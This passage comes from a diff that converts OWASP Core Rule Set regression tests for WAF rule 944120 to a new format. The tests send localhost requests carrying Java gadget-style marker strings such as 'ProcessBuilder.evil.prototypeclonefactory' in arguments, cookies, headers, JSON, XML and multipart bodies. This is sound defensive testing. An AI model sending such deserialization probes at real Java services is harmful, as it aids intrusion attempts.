Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 98 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 99 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - 
-----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-100 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 100 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-101 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 101 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - 
-----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-102 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 102 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-103 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 103 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 104 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log: + expect_ids: [944120] + - test_id: 105 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 106 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 107 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 108 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 109 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 110 desc: "XML attribute value includes keyword 
ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 111 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" 
+ version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 112 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 113 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 114 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 115 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 116 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + 
Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-117 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 117 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-118 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + 
-----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-119 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 119 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-120 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 120 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-121 + - input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 121 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log: + expect_ids: [944120] + - test_id: 122 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 